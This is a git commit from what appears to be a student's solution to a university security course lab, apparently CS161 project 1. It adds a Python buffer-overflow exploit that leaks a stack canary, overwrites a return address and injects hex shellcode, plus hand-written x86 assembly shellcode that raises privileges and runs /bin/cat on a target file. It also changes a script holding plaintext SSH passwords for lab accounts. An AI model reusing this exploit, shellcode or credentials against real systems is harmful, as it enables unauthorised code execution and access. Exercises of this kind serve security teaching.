proj1 p4 done

983cbe5f · Recolic Keghart · 3611b52c · 983cbe5f · 983cbe5f · 983cbe5f
Unverified Commit 983cbe5f authored 6 years ago by Recolic Keghart
--- a/proj1/solution/interact4
+++ b/proj1/solution/interact4
+#!/usr/bin/env python2
+from scaffold import *
+### YOUR CODE STARTS HERE ###
+import tempfile, subprocess
+def py3in2(func_text, arg):
+    # escape char in arg should be escaped twice. 
+    payload = ['#/usr/bin/env python3', 'def _func(arg):']
+    for line in func_text.split('\n'):
+        payload.append('    ' + line)
+    payload.append('with open("/dev/fd/1", "w") as f:\n    f.write(_func(\''+arg+'\'))\n')
+    payload = '\n'.join(payload)
+    with tempfile.NamedTemporaryFile() as tf:
+        tf.file.write(payload)
+        tf.file.close()
+        output = subprocess.check_output(["python3", tf.name], stderr=subprocess.PIPE)
+        return output
+def fuck_raddr(txt, rev=True):
+    def fuck8(txt):
+        assert(len(txt) == 8)
+        return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
+    def revert(txt):
+        assert(len(txt) % 8 == 0)
+        res = ""
+        for i in range(int(len(txt) / 8)):
+            res += fuck8(txt[i*8:(i+1)*8])
+        return res
+    import binascii
+    if rev:
+        txt = revert(txt)
+    b = binascii.unhexlify(txt)
+    return b
+############# real code begin
+payload1 = '0123456789ab\\x' + '\n'
+p.send(payload1)
+reply1 = p.recvline()
+reply_canary = reply1[13:17]
+fill1 = "1"*16
+canary = reply_canary
+fill2 = "\0"*8
+retaddr = fuck_raddr("bffffaf4") # "bffffaf4"
+#payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f2f6c73682f62696e545b505389e131d2b00bcd800a", False) # SHELLCODE
+payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f636174682f62696e545b506841444d45682f2f524568652f6a7a682f686f6d545950515389e131d2b00bcd80", False) # SHELLCODE
+#payload = SHELLCODE
+msg = fill1 + canary + fill2 + retaddr + payload + '\n'
+#print(msg)
+p.send(msg)
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+# HINT: the last line of your exploit should look something like:
+#   p.send('A' * m + canary + 'B' * n + rip + SHELLCODE + '\n')
+# where m, canary, n and rip are all values you must determine
+### YOUR CODE  ENDS  HERE ###
+returncode = p.end()
+if returncode == -11: print 'segmentation fault or stack canary!'
+elif returncode != 0: print 'return code', returncode
--- a/proj1/solution/payload4.s
+++ b/proj1/solution/payload4.s
+// recolic: the shellcode provided by cs161 doesn't work.
+// so I have to rewrite it for proj1 problem4
+push   $0x31
+pop    %eax
+int    $0x80
+mov    %eax,%ebx
+mov    %eax,%ecx
+push   $0x46
+pop    %eax
+int    $0x80
+xor    %eax,%eax
+// \0\0\0\0
+push   %eax
+// /bin /cat
+push   $0x7461632f
+push   $0x6e69622f
+//mov %esp %ebx
+push %esp
+pop %ebx
+// \0\0\0\0
+push   %eax
+// /hom e/jz //RE ADME
+push   $0x454d4441
+push   $0x45522f2f
+push   $0x7a6a2f65
+push   $0x6d6f682f
+//mov %esp %ecx
+push %esp
+pop %ecx
+//// \0\0\0\0
+//push   %eax
+//// /bin //ls
+//push   $0x736c2f2f
+//push   $0x6e69622f
+//
+//push   %esp
+//pop    %ebx
+// \0\0\0\0 NULL
+push   %eax
+// &arg[1]
+push   %ecx
+// &arg[0]
+push   %ebx
+mov    %esp,%ecx
+xor    %edx,%edx
+mov    $0xb,%al
+int    $0x80
--- a/proj1/ssh.sh
+++ b/proj1/ssh.sh
@@ -7,5 +7,7 @@ else
    echo 'Connecting localhost...'
    #sshpass -p r4e8kWpeFC ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  vsftpd@localhost -p 16161
    #sshpass -p 37ZFBrAPm8 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  smith@localhost -p 16161
-    sshpass -p mXFLFR5C62 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  brown@localhost -p 16161
+    #sshpass -p mXFLFR5C62 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  brown@localhost -p 16161
+    sshpass -p cqkeuevfIO ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  jz@localhost -p 16161
 fi